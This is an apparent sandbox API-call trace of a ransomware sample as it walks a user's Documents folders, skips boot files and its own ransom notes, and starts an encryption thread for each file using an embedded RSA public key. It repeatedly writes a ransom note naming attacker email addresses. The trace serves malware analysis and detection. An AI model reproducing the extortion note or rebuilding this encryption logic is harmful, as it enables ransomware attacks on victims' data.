[0235.911] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\", lpSrch="Desktop") returned 0x0 [0235.911] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\", lpSrch="DESKTOP") returned 0x0 [0235.911] SetErrorMode (uMode=0x1) returned 0x1 [0235.911] wsprintfW (in: param_1=0x17b43c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\_HELP_INSTRUCTION.TXT") returned 70 [0235.911] GetUserNameW (in: lpBuffer=0x179218, pcbBuffer=0x179004 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x179004) returned 1 [0235.911] wsprintfW (in: param_1=0x179010, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0235.911] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17900c | out: phkResult=0x17900c*=0x11d0) returned 0x0 [0235.911] RegQueryValueExW (in: hKey=0x11d0, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43d4628, lpcbData=0x179008*=0x104 | out: lpType=0x0, lpData=0x43d4628*=0x65, lpcbData=0x179008*=0x4a) returned 0x0 [0235.911] RegCloseKey (hKey=0x11d0) returned 0x0 [0235.911] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17a43c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0235.911] wsprintfW (in: param_1=0x17943c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0235.912] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my music\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x11d0 [0235.912] CloseHandle (hObject=0x11d0) returned 1 [0235.912] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0xffffffff [0235.912] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0235.912] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0235.912] lstrcmpW (lpString1="My Pictures", lpString2="..") returned 1 [0235.912] lstrcmpW (lpString1="My Pictures", lpString2=".") returned 1 [0235.912] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" [0235.912] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0235.912] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="My Pictures" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures" [0235.912] SetErrorMode (uMode=0x1) returned 0x1 [0235.912] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures" [0235.912] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\" [0235.912] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\" [0235.912] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\*.*" [0235.912] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0xffffffff [0235.912] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0235.912] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures" [0235.912] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\*.*" [0235.912] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\", lpSrch="Desktop") returned 0x0 [0235.912] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\", lpSrch="DESKTOP") returned 0x0 [0235.912] SetErrorMode (uMode=0x1) returned 0x1 [0235.912] wsprintfW (in: param_1=0x17b43c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\_HELP_INSTRUCTION.TXT") returned 73 [0235.913] GetUserNameW (in: lpBuffer=0x179218, pcbBuffer=0x179004 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x179004) returned 1 [0235.913] wsprintfW (in: param_1=0x179010, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0235.913] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17900c | out: phkResult=0x17900c*=0x11d0) returned 0x0 [0235.913] RegQueryValueExW (in: hKey=0x11d0, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43d4858, lpcbData=0x179008*=0x104 | out: lpType=0x0, lpData=0x43d4858*=0x65, lpcbData=0x179008*=0x4a) returned 0x0 [0235.913] RegCloseKey (hKey=0x11d0) returned 0x0 [0235.913] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17a43c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0235.913] wsprintfW (in: param_1=0x17943c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0235.913] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my pictures\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x11d0 [0235.913] CloseHandle (hObject=0x11d0) returned 1 [0235.913] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0xffffffff [0235.913] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0235.913] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0235.913] lstrcmpW (lpString1="My Shapes", lpString2="..") returned 1 [0235.913] lstrcmpW (lpString1="My Shapes", lpString2=".") returned 1 [0235.913] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" [0235.913] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0235.913] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="My Shapes" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes" [0235.913] SetErrorMode (uMode=0x1) returned 0x1 [0235.913] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes" [0235.913] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\" [0235.914] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\" [0235.914] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*.*" [0235.914] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x3cdec58 [0235.914] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes") returned="My Shapes" [0235.914] lstrcpyW (in: lpString1=0x17b644, lpString2="My Shapes" | out: lpString1="My Shapes") returned="My Shapes" [0235.914] StrStrW (lpFirst="BF7B86490294F06B45AC44D706ACD4B3.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0235.914] StrStrW (lpFirst="BF7B86490294F06B45AC44D706ACD4B3.XZZX", lpSrch="ntldr") returned 0x0 [0235.914] StrStrW (lpFirst="BF7B86490294F06B45AC44D706ACD4B3.XZZX", lpSrch="NTLDR") returned 0x0 [0235.914] StrStrW (lpFirst="BF7B86490294F06B45AC44D706ACD4B3.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0235.914] StrStrW (lpFirst="BF7B86490294F06B45AC44D706ACD4B3.XZZX", lpSrch="ntdetect.com") returned 0x0 [0235.914] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\", lpSrch="Desktop") returned 0x0 [0235.914] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\", lpSrch="DESKTOP") returned 0x0 [0235.914] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned 54 [0235.914] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0235.914] lstrcpyW (in: lpString1=0x17be7c, lpString2="BF7B86490294F06B45AC44D706ACD4B3.XZZX" | out: lpString1="BF7B86490294F06B45AC44D706ACD4B3.XZZX") returned="BF7B86490294F06B45AC44D706ACD4B3.XZZX" [0235.914] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\" [0235.914] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x11d4 [0235.914] Sleep (dwMilliseconds=0x96) [0236.067] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0236.067] lstrcmpW (lpString1="Favorites.vss", lpString2="..") returned 1 [0236.067] lstrcmpW (lpString1="Favorites.vss", lpString2=".") returned 1 [0236.067] StrStrW (lpFirst="Favorites.vss", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0236.067] StrStrW (lpFirst="Favorites.vss", lpSrch="ntldr") returned 0x0 [0236.067] StrStrW (lpFirst="Favorites.vss", lpSrch="NTLDR") returned 0x0 [0236.067] StrStrW (lpFirst="Favorites.vss", lpSrch="NTDETECT.COM") returned 0x0 [0236.067] StrStrW (lpFirst="Favorites.vss", lpSrch="ntdetect.com") returned 0x0 [0236.067] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\", lpSrch="Desktop") returned 0x0 [0236.067] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\", lpSrch="DESKTOP") returned 0x0 [0236.067] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned 54 [0236.068] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0236.068] lstrcpyW (in: lpString1=0x17be7c, lpString2="Favorites.vss" | out: lpString1="Favorites.vss") returned="Favorites.vss" [0236.068] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\" [0236.068] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x11d8 [0236.068] Sleep (dwMilliseconds=0x96) [0236.220] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0236.220] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0236.221] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0236.221] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0236.221] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0236.221] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0236.221] FindClose (in: hFindFile=0x3cdec58 | out: hFindFile=0x3cdec58) returned 1 [0236.221] FindClose (in: hFindFile=0x3cdec58 | out: hFindFile=0x3cdec58) returned 0 [0236.221] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes" [0236.221] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*.*" [0236.221] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\", lpSrch="Desktop") returned 0x0 [0236.221] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\", lpSrch="DESKTOP") returned 0x0 [0236.221] SetErrorMode (uMode=0x1) returned 0x1 [0236.221] wsprintfW (in: param_1=0x17b43c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_HELP_INSTRUCTION.TXT") returned 71 [0236.221] GetUserNameW (in: lpBuffer=0x179218, pcbBuffer=0x179004 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x179004) returned 1 [0236.222] wsprintfW (in: param_1=0x179010, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0236.222] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17900c | out: phkResult=0x17900c*=0x11e0) returned 0x0 [0236.222] RegQueryValueExW (in: hKey=0x11e0, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43d4a88, lpcbData=0x179008*=0x104 | out: lpType=0x0, lpData=0x43d4a88*=0x65, lpcbData=0x179008*=0x4a) returned 0x0 [0236.222] RegCloseKey (hKey=0x11e0) returned 0x0 [0236.222] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17a43c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0236.222] wsprintfW (in: param_1=0x17943c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0236.222] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x11e0 [0236.222] CloseHandle (hObject=0x11e0) returned 1 [0236.222] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x3cdec58 [0236.222] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes") returned="My Shapes" [0236.222] lstrcpyW (in: lpString1=0x17b644, lpString2="My Shapes" | out: lpString1="My Shapes") returned="My Shapes" [0236.223] lstrcpyW (in: lpString1=0x17c4d0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes" [0236.223] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\" [0236.223] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\", lpString2="_private" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private" [0236.223] SetErrorMode (uMode=0x1) returned 0x1 [0236.223] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private" [0236.223] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\" [0236.223] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\" [0236.223] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\*.*" [0236.223] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\*.*", lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0x3cdecd8 [0236.223] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private") returned="_private" [0236.223] lstrcpyW (in: lpString1=0x17a5a4, lpString2="_private" | out: lpString1="_private") returned="_private" [0236.223] StrStrW (lpFirst="7B7BA3C4205941180FE9457124712560.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0236.223] StrStrW (lpFirst="7B7BA3C4205941180FE9457124712560.XZZX", lpSrch="ntldr") returned 0x0 [0236.223] StrStrW 